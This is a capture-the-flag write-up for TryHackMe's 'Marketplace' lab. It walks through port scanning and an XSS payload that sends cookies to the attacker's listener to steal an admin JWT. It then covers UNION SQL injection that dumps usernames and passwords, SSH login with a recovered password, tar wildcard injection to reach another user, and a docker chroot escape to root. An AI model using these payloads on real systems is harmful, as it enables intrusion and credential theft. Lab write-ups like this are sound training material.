The Marketplace
Room Link: https://tryhackme.com/room/marketplace
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/32768 - HTTP
Kali
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

XSS - Steal JVT


I tried updating the token it didn't work


Next we're going to try to steal the JWT from another user.
Kali
nc -lvnp 4444
Browser
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>

This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button

we got a token from a user that isn't us

We can see it is from Michael who is an admin.


Sent again but this time just forwarded the request so we could see what that script was doing

The script was printing the flag

This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.

Brower cookie
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
We add a order by and increase the number until we get an error to reveal how many fields there are.

After 5 it give us an error so we know there are four fields

We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info

To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s

Get Version

Get Database

Get tables
UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()

Get All tables by concat
-1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database()

Get Columns for table users
-1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace

Get Columns for table items
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'

Get Columns for table messages
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'

Get Columns for table messages
-1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages

Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames.
-1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users




TCP/22 - SSH
Kali
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ

Lateral Movement
Exploit: https://gtfobins.github.io/gtfobins/tar/
Jake can run a backup script as michael. The script is using a wildcard which we manipulate.


We can trick the script to run this to get a shell by making empty files with similar names

Victim
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh shell.sh
vi shell.sh
shell.sh
#!/bin/bash
cp /bin/bash /opt/backups/michealbash;
chmod +xs /opt/backups/michealbash;
Victim
chmod +x shell.sh
rm -f ../backup.tar
sudo -u michael /opt/backups/backup.sh

Privilege Escalation
Victim(micheal)
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh
michael is part of the docker group so it appears we're in a pod

There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.


Last updated